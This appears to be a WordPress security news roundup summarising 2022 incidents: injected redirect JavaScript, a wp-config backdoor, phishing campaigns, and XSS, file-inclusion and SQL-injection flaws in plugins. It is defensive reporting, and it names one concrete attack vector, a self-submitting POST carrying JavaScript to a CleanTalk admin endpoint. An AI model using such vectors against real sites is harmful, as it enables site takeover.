Massive WordPress JavaScript Injection Campaign Redirects to Ads 

Sucuri’s remediation and research teams regularly find malicious redirects on client sites. These infections automatically redirect site visitors to third-party websites with malicious resources, scam pages, or commercial websites with the intention of generating illegitimate traffic.

As outlined in Sucuri’s latest hacked website report, they’ve been tracking a long-lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the year — for example, according to PublicWWW (May 2022), the April wave for this campaign was responsible for over 9,300 infected websites alone.

Since these PublicWWW results only show detections for simple script injections, we can assume that the scope is significantly larger.

Investigating Obfuscated JavaScript in WordPress Sites

We recently investigated a number of WordPress websites complaining about unwanted redirects. Interestingly enough, they were found to be related to a new wave of this massive campaign and were sending website visitors through a series of website redirects to serve them unwanted ads.

The websites all shared a common issue — malicious JavaScript had been injected within their website’s files and the database, including legitimate core WordPress files such as:

  • ./wp-includes/js/jquery/jquery.min.js
  • ./wp-includes/js/jquery/jquery-migrate.min.js

Once the website had been compromised, attackers had attempted to automatically infect any .js files with jQuery in the names. They injected code that begins with “/* trackmyposs*/eval(String.fromCharCode…”

Continue reading: https://blog.sucuri.net/2022/05/massive-wordpress-javascript-injection-campaign-redirects-to-ads.html

Cybercriminals are using SEO to improve the ranking of malicious PDFs on search results

In brief: Netskope’s new security report shows that there’s been a fivefold yearly increase in malicious PDF phishing downloads, with a lot of victims getting referred from search engines. Meanwhile, downloads of Microsoft Office files containing malware have returned to pre-Emotet levels.

Netskope, a security service edge provider, just published their new Cloud and Threat Report, which examines the past 12 months of malware downloads from the cloud and web.

Research shows that there’s been a 450 percent yearly increase in malicious PDF phishing downloads, with attackers using search engine optimization (SEO) techniques to improve the ranking of malicious PDF files on search engines such as Google and Bing.

These files often take the form of fake file sharing requests, fake invoices, or even fake Captchas that redirect users to phishing, spam, scam, and malware websites.

According to the report, most malware is being downloaded from within the same region as its victim in order to avoid geofencing filters. Over 80 percent of all malware downloads by victims in North America were downloaded from websites hosted there.

There are several other noteworthy findings in the report. Trojans continue to be effective, with 77 percent of malware downloads being Trojans. There is no single Trojan family that is globally dominant, with the top 10 families accounting for only 13 percent of all downloads.

Cybercriminals use a combination of web and cloud to target their victims, as 53 percent of malware downloads originate from traditional websites and the rest from cloud apps used for collaboration and webmail. Here, attackers can send messages to their victims through emails, direct messages, comments, and document shares.

Source: https://www.techspot.com/news/94547-cybercriminals-using-seo-improve-ranking-malicious-pdfs-search.html

Dangerous new one-click Gmail hack puts your private data at risk

If you need any more reasons to be particularly careful when opening an email attachment, here’s one for you. A new Gmail hack campaign is currently making the rounds, and a single click could be enough to infect your computer and put your data at risk.

Last week, Trustwave senior security researcher Diana Lopera published a blog post about a frightening new email hack campaign. According to Lopera, scammers are sneakily attaching malicious files to emails using file formats that would not normally raise suspicion. They are using this technique to spread the data-stealing Vidar malware.

The emails are short and direct the reader’s attention to the attachment. The attachment in question is often named “request.doc,” but it is really an ISO file. As Lopera explains, ISO is a disk image file format cybercriminals occasionally use to store malware. It might look like a text document, but the ISO actually contains two files. One is a Microsoft Compiled HTML Help (CHM) file named “pss10r.chm” and the other is an executable named “app.exe.”

As you hopefully know by now, never ever open an email attachment from a source you don’t recognize. In fact, even if you do recognize the sender, double-check everything first. There are plenty of scams that involve using similar addresses to convince victims of their legitimacy.

More details: https://bgr.com/tech/dangerous-new-one-click-gmail-hack-puts-your-private-data-at-risk

Reflected XSS in Spam protection, AntiSpam, FireWall by CleanTalk

CleanTalk is a WordPress plugin designed to protect websites from spam comments and registrations. One of the features it includes is the ability to check comments for spam and present the spammy comments for deletion.

Thanks to a quirk of how WordPress processes the page parameter and the default PHP request order, it is possible to use this parameter to perform a reflected cross-site scripting attack, which is almost identical to a vulnerability recently covered by the folks at WordFence.

The vulnerability can be used to execute JavaScript in the browser of a logged-in administrator, for instance, by tricking them into visiting a self-submitting form that sends a POST request to the site at wp-admin/edit-comments.php?page=ct_check_spam, with the $_POST[‘page’] parameter set to malicious JavaScript.

As with any Cross-Site Scripting vulnerability, executing JavaScript in an administrator’s session can be used to take over a site by adding a new malicious administrator or injecting a backdoor, among other potential methods.

A patched version was released on March 25th and installed on all our clients’ websites the same day.

Increase In Malware Sightings on GoDaddy Managed Hosting

On March 15, 2022, The Wordfence Incident Response team alerted the WordFence Threat Intelligence team to an increase in infected websites hosted on GoDaddy’s Managed WordPress service, which includes MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress sites. These affected sites have a nearly identical backdoor prepended to the wp-config.php file. Of the 298 sites that have been newly infected by this backdoor starting 5 days ago on March 11, at least 281 are hosted with GoDaddy.

The backdoor in question has been in use since at least 2015. It generates spammy Google search results and includes resources customized to the infected site. The main backdoor is added to the very beginning of wp-config.php and looks like this:

The encoded file that is downloaded contains a template based on the infected site source code, but with links to pharmaceutical spam added. This spam link template is set to display whenever the site is accessed.

If your site is hosted on GoDaddy’s Managed WordPress platform (which includes MediaTemple, tsoHost, 123Reg, Domain Factory, Heart Internet, and Host Europe Managed WordPress sites), we strongly recommend that you manually check your site’s wp-config.php file, or run a scan with a malware detection solution such as the free Wordfence scanner to ensure that your site is not infected.

If your site is infected you will need to have it cleaned and may also need to remove spam search engine results. 

Source: https://www.wordfence.com/blog/2022/03/increase-in-malware-sightings-on-godaddy-managed-hosting

Beware: new IRS rules will lead to a wave of phishing frauds

Thanks to new legislation that went into place at the beginning of this year, I predict that a lot of unsuspecting small business owners are about to fall victim to a fresh scam.

The scam will relate to legislation around new tax reporting rules that will affect millions of freelancers and small businesses. As explained in an earlier column, beginning for the 2022 tax year, if you receive more than $600 in total payments during the course of the year from a payment service like PayPal, Venmo (which is owned by PayPal), Square, Stripe or online sales of your products made through Amazon, Etsy and other marketplaces – regardless of how many customers are paying – that payment service is required to report that amount to the IRS and to you by sending a Form 1099-K – used for reporting payments via these third parties – in early 2023.

Full story: https://www.theguardian.com/money/2022/feb/27/beware-phising-fraud-new-irs-rules-online-payment-service-receipts

Elementor WordPress plugin has a gaping security hole – update now

If you run a WordPress site and you use the Elementor website creation toolkit, you could be at risk of a security hole that combines data leakage and remote code execution.

That’s if you use a plugin called Essential Addons for Elementor, which is a popular tool for adding visual features such as timelines, image galleries, ecommerce forms and price lists.

An independent threat researcher called Wai Yan Myo Thet recently discovered what’s known as a file inclusion vulnerability in the product.

This security hole made it possible for attackers to trick the plugin into accessing and including a server-side file…

…using a filename supplied in the incoming web request.

Simply put, a malicious visitor could trick an unpatched server into serving up a file it’s not supposed to, such as the server’s own username database, or coerce the server into running a script it shouldn’t, thus creating a remote code execution (RCE) hole.

As you probably know, web server RCE bugs are typically abused to implant malware that allows the attackers to do something to your immediate, and often costly, detriment.

Clients of ProtectYourWP.com have already been updated, of course.

Source and more details: https://nakedsecurity.sophos.com/2022/02/02/elementor-wordpress-plugin-has-a-gaping-security-hole-update-now/

https://www.darkreading.com/vulnerabilities-threats/tens-of-thousands-of-websites-vulnerable-to-rce-flaw-in-wordpress-plugin

Massive attack against 1.6 million WordPress sites underway

Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.

The threat actors target four WordPress plugins and fifteen Epsilon Framework themes, one of which has no available patch.

Some of the targeted plugins were patched all the way back in 2018, while others had their vulnerabilities addressed as recently as this week.

The affected plugins and their versions are:

  • PublishPress Capabilities
  • Kiwi Social Plugin
  • Pinterest Automatic
  • WordPress Automatic

The targeted Epsilon Framework themes are:

  • Shapely
  • NewsMag
  • Activello
  • Illdy
  • Allegiant
  • Newspaper X
  • Pixova Lite
  • Brilliance
  • MedZone Lite
  • Regina Lite
  • Transcend
  • Affluent
  • Bonkers
  • Antreas
  • NatureMag Lite – No patch available

“In most cases, the attackers are updating the users_can_register option to enabled and setting the default_role option to administrator,” Wordfence explains.

“This makes it possible for attackers to register on any site as an administrator effectively taking over the site.”

Source: https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/

WordPress Cache Plugin Exploit Affects +1 Million Websites

WP Fastest Cache WordPress plugin vulnerabilities can lead to full site takeover and password leaks

Popular WordPress plugin WP Fastest Cache plugin was discovered by Jetpack security researchers to have multiple vulnerabilities that could allow an attacker to assume full administrator privileges. The exploits affect over a million WordPress installations.

The Authenticated SQL Injection allows a logged-in users to access administrator level information through the database.

A SQL Injection vulnerability is an attack that’s directed at the database, which is where the website elements, including passwords, are stored.

A successful SQL Injection attack could lead to a full website takeover.

More at original article: https://www.searchenginejournal.com/wp-fastest-cache-vulnerability/424278/amp/